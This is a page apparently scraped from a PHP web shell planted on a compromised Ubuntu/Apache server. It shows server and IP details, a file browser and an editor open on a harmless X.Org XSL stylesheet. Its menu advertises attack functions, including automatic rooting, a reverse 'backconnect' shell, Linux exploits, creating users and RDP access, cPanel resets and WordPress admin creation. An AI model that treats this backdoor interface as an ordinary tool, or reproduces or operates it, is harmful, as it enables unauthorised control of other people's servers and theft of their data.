Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.181
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
sgml /
X11 /
[ HOME SHELL ]
Name
Size
Permission
Action
dbs
[ DIR ]
drwxr-xr-x
defs.ent
1.19
KB
-rw-r--r--
xorg-chunk.xsl
2.23
KB
-rw-r--r--
xorg-fo.xsl
3.79
KB
-rw-r--r--
xorg-xhtml.xsl
1.97
KB
-rw-r--r--
xorg.css
8.38
KB
-rw-r--r--
xorg.xsl
3.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xorg-chunk.xsl
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xsl:stylesheet [ <!ENTITY xorgcss SYSTEM "xorg.css"> ]> <!-- X.Org DocBook/XML customization DocBook XSL Stylesheets HTML Parameters http://docbook.sourceforge.net/release/xsl/current/doc/html/ --> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version='1.0'> <xsl:import href="http://docbook.sourceforge.net/release/xsl/current/xhtml/chunk.xsl"/> <!-- Embedding CSS styles http://www.sagehill.net/docbookxsl/HtmlHead.html#EmbedCSS --> <xsl:template name="user.head.content"> <style type="text/css"> <xsl:text disable-output-escaping="yes">&xorgcss;</xsl:text> </style> </xsl:template> <!-- Reference Pages HTML/FO Parameters --> <!-- The formatting of a function element will include generated parentheses --> <xsl:param name="function.parens" select="1"/> <!-- ANSI-style function synopses are generated for a funcsynopsis element --> <xsl:param name="funcsynopsis.style" select="ansi"/> <!-- Miscellaneous HTML/FO Parameters--> <!-- SVG will be considered an acceptable image format --> <xsl:param name="use.svg" select="1"/> <!-- Pagination and General Styles HTML/FO Parameters --> <!-- Speed up ps & pdf creation by not creating pages with "draft" image, thus not needing to wait for http fetch of draft.png from docbook website. --> <xsl:param name="draft.mode" select="no"/> <!-- ToC/LoT/Index Generation HTML Parameters --> <!-- Index links should point to indexterm location, not start of section --> <xsl:param name="index.links.to.section" select="0"/> <!-- HTML Parameters --> <!-- Uses XSLT Extension to provide more valid and better formatted elements--> <xsl:param name="html.cleanup" select="1"/> <!-- Chunking HTML Parameters --> <!-- Use ID value of chunk elements as the filename --> <xsl:param name="use.id.as.filename" select="1"></xsl:param> <!-- Chunk the first top-level section --> <xsl:param name="chunk.first.sections" select="1"></xsl:param> <!-- Meta/*Info and Titlepages HTML Parameters--> <!-- Suppress abstract on title pages --> <xsl:param name="abstract.notitle.enabled" select="1"/> <!-- Lists HTML Parameters--> <xsl:param name="variablelist.as.table" select="1"/> </xsl:stylesheet>
Close